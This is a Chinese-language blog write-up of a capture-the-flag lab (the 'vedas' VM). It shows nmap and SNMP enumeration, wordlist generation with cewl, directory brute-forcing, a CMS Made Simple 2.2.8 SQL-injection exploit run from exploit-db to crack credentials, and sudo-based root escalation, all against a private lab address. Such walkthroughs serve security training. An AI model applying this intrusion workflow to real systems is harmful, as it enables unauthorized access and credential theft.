vedas靶机渗透攻略

信息收集

nmap扫描

nmap -sC -sV 192.168.93.0/24 -p-

在这里插入图片描述

目标192.168.93.135 开放22ssh 80http

网站信息收集

在这里插入图片描述

首页没啥东西
目录爆破也没啥,22端口爆破太费劲…

扫描udp协议

tcp没思路,扫扫udp
nmap -sU -sV 192.168.93.135
在这里插入图片描述

68dhcp没啥用,161snmp倒是有点意思

msf探测snmp信息

search snmp

use 25
在这里插入图片描述

在这里插入图片描述

发现一个flag,并提示去root的方式 一串神秘字符 0e462097431
那就干脆爬取一下网站关键字,获取可能的用户

网站关键字爬取

cewl http://192.168.93.135 -w user.txt

在这里插入图片描述

目录爆破

带上刚才爬取到的信息去爆破目录
dirb http://192.168.93.135 user.txt

在这里插入图片描述

多了一个连接 http://192.168.93.135/Kashyapa/
访问一下
在这里插入图片描述

发现cms版本 CMS Made Simple version 2.2.8
在这里插入图片描述

漏洞利用

searchsploit CMS Made Simple
在这里插入图片描述

找一找适用于2.2.8版本的exp
在这里插入图片描述

也就这个sql注入能用
可能出现报错-缺少termcolor模块
官网下载导入 https://pypi.org/project/termcolor/#files

在这里插入图片描述

python 46635.py -u http://192.168.93.135/Kashyapa/ --crack -w usr.txt

在这里插入图片描述

得到账密 登录后台
在这里插入图片描述

发现flag2
在这里插入图片描述

又提示神秘字符串 906509019

尝试ssh登录,结果成功了,省的传马了
在这里插入图片描述

在/opt/test下发现 了flag3
在这里插入图片描述

又得到一串神秘数字562988736854

提权

0e462097431906509019562988736854 一看就是个MD5
解密后得到240610708
在这里插入图片描述

看看有啥用户能登录
在这里插入图片描述

root进不去,vedas倒是进去了 ,看看sudo权限,啥都有!
在这里插入图片描述

提权成功,拿到flag!

  • 1
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Forest深林

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值